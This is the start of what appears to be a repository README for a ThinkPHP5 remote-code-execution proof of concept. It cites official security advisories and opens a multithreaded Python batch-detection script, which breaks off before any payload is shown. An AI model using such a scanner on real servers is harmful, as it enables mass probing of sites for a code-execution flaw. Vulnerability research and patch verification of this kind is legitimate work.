thinkphp-RCE-POC
官方公告:
1、ThinkPHP5.*版本发布安全更新 · ThinkPHP官方博客 · 看云
2、ThinkPHP5.0.24版本发布——安全更新 · ThinkPHP官方博客 · 看云
POC:
批量检测
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: thinkphp远程代码检测
description: ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
'''
import re
import sys
import requests
import queue
import threading
from bs4 import BeautifulSoup
class thinkphp_rce(threading.Thread):
def __init__(self, q):
threading.Thread.__init__(self)
self.q &